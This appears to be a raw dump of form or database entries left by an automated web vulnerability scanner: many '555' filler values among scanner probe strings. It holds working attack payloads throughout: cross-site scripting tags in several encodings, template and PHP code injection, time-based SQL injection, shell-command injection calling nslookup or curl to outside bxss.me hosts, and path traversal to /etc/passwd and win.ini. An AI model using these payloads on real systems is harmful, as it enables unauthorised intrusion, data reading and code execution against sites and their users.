555
555
555
555
555UKWWD[!+!]
555Mq8g3 beDP(9931)
555}body{zzz:Expre/**/SSion(beDP(9033))}
555
555<ScRiPt>beDP(9095)</sCripT>
555\u003CScRiPt\beDP(9788)\u003C/sCripT\u003E
%35%35%35%3C%53%63%52%69%50%74%20%3E%62%65%44%50%289791%29%3C%2F%73%43%72%69%70%54%3E
555
555
555
555
555
555
555
555beDP(9632)
555
555beDP(9657)
555%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%62%65%44%50%28%39%36%33%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
555beDP(9750)9750
555beDP(9004)
555HRITE[!+!]
555beDP(9318)
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
555
dfb[[${98991*97996}]]xca
555
dfb{{98991*97996}}xca
555
555
1}}"}}'}}1%>"%>'%>
555
555
555
bfgx9102%C0%BEz1%C0%BCz2a%90bcxhjl9102
bfg10813%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl10813
555
555
5559160973
555
'"()&%beDP(9857)
555
555'"()&%beDP(9493)
555
555
555
555
555EDQGD[!+!]
555PwtUj Grlc(9912)
555}body{zzz:Expre/**/SSion(Grlc(9896))}
555
555<ScRiPt>Grlc(9702)</sCripT>
555\u003CScRiPt\Grlc(9805)\u003C/sCripT\u003E
%35%35%35%3C%53%63%52%69%50%74%20%3E%47%72%6C%63%289203%29%3C%2F%73%43%72%69%70%54%3E
555
555
555
555
555
555
555
555Grlc(9145)
555
555Grlc(9220)
555%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%47%72%6C%63%28%39%34%35%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
555Grlc(9274)9274
555Grlc(9785)
5557HEIW[!+!]
555Grlc(9142)
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
dfb__${98991*97996}__::.x
555
dfb[[${98991*97996}]]xca
555
dfb{{98991*97996}}xca
1}}"}}'}}1%>"%>'%>
555
555
555
555
bfgx9938%C0%BEz1%C0%BCz2a%90bcxhjl9938
555
bfg6808%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl6808
555
5559618974
555
555
'"()&%Grlc(9304)
555'"()&%Grlc(9109)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
[php]print(md5(31337));[/php]
555
555
555
555
555
print(md5(31337));//
555
{php}print(md5(31337));{/php}
555
'{${print(md5(31337))}}'
555
555
555
555
'.print(md5(31337)).'
555
${@print(md5(31337))}
${@print(md5(31337))}\
555
555
";print(md5(31337));$a="
555
';print(md5(31337));$a='
555
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@UWZt4
555
555
555
555'"
555
555
555
555
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555Ci5fHENj' OR 515=(SELECT 515 FROM PG_SLEEP(15))--
555
555
555pTHOll24')) OR 444=(SELECT 444 FROM PG_SLEEP(15))--
555
555
555
555-1)) OR 116=(SELECT 116 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555
555
555
555-1) OR 50=(SELECT 50 FROM PG_SLEEP(15))--
555
555qPqO8842'; waitfor delay '0:0:15' --
555
555
555-1 OR 419=(SELECT 419 FROM PG_SLEEP(15))--
555"||sleep(27*1000)*fkjfbc||"
555
555-1 waitfor delay '0:0:15' --
555
555
555-1); waitfor delay '0:0:15' --
555"&&sleep(27*1000)*omncla&&"
555'||sleep(27*1000)*jpeamz||'
555
'"()
555-1; waitfor delay '0:0:15' --
555'&&sleep(27*1000)*nvojot&&'
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
Array
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
Array
Array
555
555
555
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
555
Array
555
555*if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
555
555
-1" OR 2+111-111-1=0+0+0+1 --
555
-1' OR 2+159-159-1=0+0+0+1 or 'NKALQYuG'='
555
555
555
555
555
555
555
555
555
555
555
555
555
-1' OR 2+613-613-1=0+0+0+1 --
555
555
-1 OR 2+289-289-1=0+0+0+1
555
555
555
555
555
555
-1 OR 2+837-837-1=0+0+0+1 --
555
555
555
555
555
555
555
555rcWHsijl
555
555
555
555
555
555
555
555
gethostbyname(lc('hitcc'.'vysrmrbk96085.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(79).chr(115).chr(75)
555
555
555
555
".gethostbyname(lc("hitsw"."vfkaunpj395af.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(84).chr(110).chr(65)."
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitcc'.'ssekpqha09076.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(76).chr(111).chr(73).'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
!(()&&!|*|*|
555
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
xfs.bxss.me
555
555
555
555
555
555
555
555
555
555
555
'A'.concat(70-3).concat(22*4).concat(97).concat(77).concat(118).concat(89)+(require'socket' Socket.gethostbyname('hitiq'+'kzaayjzu14734.bxss.me.')[3].to_s)
555
555
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(114).concat(71).concat(112).concat(80)+(require'socket' Socket.gethostbyname('hitog'+'qtvvvetfca072.bxss.me.')[3].to_s)+'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(106).concat(67).concat(103).concat(65)+(require"socket" Socket.gethostbyname("hitmy"+"qgdzzxmc36281.bxss.me.")[3].to_s)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitbvamhbzzlr54a45.bxss.me||curl${IFS}hitbvamhbzzlr54a45.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitbvamhbzzlr54a45.bxss.me||curl${IFS}hitbvamhbzzlr54a45.bxss.me)&`'
555
555
555
555
555
555
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hityxoiswysdq7ca2e.bxss.me||curl${IFS}hityxoiswysdq7ca2e.bxss.me)
555
555
555
555
555
bxss.me/t/xss.html?%00
HttP://bxss.me/t/xss.html?%00
555
555
;(nslookup -q=cname hitiyzqjwoqur96d5e.bxss.me||curl hitiyzqjwoqur96d5e.bxss.me)|(nslookup -q=cname hitiyzqjwoqur96d5e.bxss.me||curl hitiyzqjwoqur96d5e.bxss.me)&(nslookup -q=cname hitiyzqjwoqur96d5e.bxss.me||curl hitiyzqjwoqur96d5e.bxss.me)
`(nslookup -q=cname hititabkntprc151f0.bxss.me||curl hititabkntprc151f0.bxss.me)`
555
555
555
555
555
555
555
555
&(nslookup -q=cname hitkrpnvitdslf1b1e.bxss.me||curl hitkrpnvitdslf1b1e.bxss.me)&'\"`0&(nslookup -q=cname hitkrpnvitdslf1b1e.bxss.me||curl hitkrpnvitdslf1b1e.bxss.me)&`'
555
555
555
|(nslookup -q=cname hitdokgtsuojo6d42b.bxss.me||curl hitdokgtsuojo6d42b.bxss.me)
555
555
555
555
&nslookup -q=cname hityuihvdckol22686.bxss.me&'\"`0&nslookup -q=cname hityuihvdckol22686.bxss.me&`'
555
555
555
555
555
555
555
555
555
expr 9000480165 - 977519
555
555
(nslookup -q=cname hitqxwnrnfigab7326.bxss.me||curl hitqxwnrnfigab7326.bxss.me))
555
555
$(nslookup -q=cname hitzenjdhxpuwf0590.bxss.me||curl hitzenjdhxpuwf0590.bxss.me)
555
555
555
555
555
555
555|echo hfbnun$()\ ujiygp\nz^xyu||a #' |echo hfbnun$()\ ujiygp\nz^xyu||a #|" |echo hfbnun$()\ ujiygp\nz^xyu||a #
|echo goawxf$()\ lxeghe\nz^xyu||a #' |echo goawxf$()\ lxeghe\nz^xyu||a #|" |echo goawxf$()\ lxeghe\nz^xyu||a #
555
555
555
555
&echo bcpqqn$()\ bxtakg\nz^xyu||a #' &echo bcpqqn$()\ bxtakg\nz^xyu||a #|" &echo bcpqqn$()\ bxtakg\nz^xyu||a #
555
555
555
555
555&echo mfvlrt$()\ ymothk\nz^xyu||a #' &echo mfvlrt$()\ ymothk\nz^xyu||a #|" &echo mfvlrt$()\ ymothk\nz^xyu||a #
555
555
echo dblxik$()\ oidtzd\nz^xyu||a #' &echo dblxik$()\ oidtzd\nz^xyu||a #|" &echo dblxik$()\ oidtzd\nz^xyu||a #
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
file:///etc/passwd
555
bxss.me
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
../../../../../../../../../../../../../../windows/win.ini
555
../../../../../../../../../../../../../../etc/shells
555
c:/windows/win.ini
555
555
555
555
555
http://bxss.me/t/fit.txt%3F.jpg
555
/etc/shells
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
555
555
Http://bxss.me/t/fit.txt
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n950106=v956621
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
Array
555
555
555
555
555
12345'"\'\");|]*%00{%0d%0a%bf%27'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
5559830950
555
${9999562+9999762}
555
555
555
555
555
555
555
555
555
555
555
'"()&%9ML4(9840)
555
555
555
555
555
555
555'"()&%9ML4(9991)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555